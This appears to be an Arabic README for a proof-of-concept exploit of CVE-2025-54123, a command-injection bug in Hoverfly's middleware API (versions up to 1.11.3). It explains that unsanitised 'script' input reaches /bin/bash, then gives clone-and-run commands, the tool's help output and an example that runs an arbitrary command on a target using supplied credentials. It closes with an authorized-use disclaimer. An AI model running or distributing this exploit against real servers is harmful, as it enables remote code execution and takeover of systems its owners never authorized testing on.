
PoC CVE-2025-54123 - Hoverfly <= 1.11.3 - حقن أوامر في الوسائط الوسيطة مع المصادقة
PoC CVE-2025-54123 - حقن أوامر في الوسيط (Middleware) في Hoverfly
يؤثر هذا الثغرة على إصدارات Hoverfly ≤ 1.11.3 ويستهدف بشكل خاص نقطة النهاية /api/v2/hoverfly/middleware. يحدث ذلك بسبب التحقق غير الكافي من المدخلات وتنقيتها في عدة ملفات، بما في ذلك middleware.go و local_middleware.go و hoverfly_service.go. يتم تمرير المدخلات التي يتحكم بها المستخدم والمقدمة إلى معامل script مباشرة إلى أداة نظام (مثل /bin/bash) دون فحوصات مناسبة، مما يسمح بـ تنفيذ الأوامر عن بُعد (RCE) بصلاحيات عملية Hoverfly.
curlgit clone https://github.com/f4dee-backup/CVE-2025-54123
cd CVE-2025-54123
chmod +x CVE-2025-54123.sh
./CVE-2025-54123.sh -h
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ ███████╗██╗ ██╗ ██╗██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ ██╔════╝██║ ██║███║╚════██╗╚════██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗███████╗███████║╚██║ █████╔╝ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝╚════██║╚════██║ ██║██╔═══╝ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ ███████║ ██║ ██║███████╗██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
Hoverfly <= 1.11.3 - حقن أوامر في الوسيط (مُوثّق)
[?] وصف المعاملات:
-t عنوان URL الأساسي للهدف (مثال: http://target:8888)
-u اسم مستخدم صالح
-p كلمة مرور صالحة
-c الأمر المراد تنفيذه (يجب وضعه بين علامتي اقتباس مزدوجتين)
-h عرض لوحة المساعدة هذه
[i] مثال:
./CVE-2025-54123.sh -t http://target.com:8888 -u admin -p password -c "id"
هذه الأداة الاستغلالية مخصصة لأغراض الاختبارات الأمنية التعليمية والمصرح بها فقط.
لا تستخدمها ضد أنظمة دون إذن صريح. قد يكون الوصول غير المصرح به غير قانوني.
لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو أي ضرر ناتج.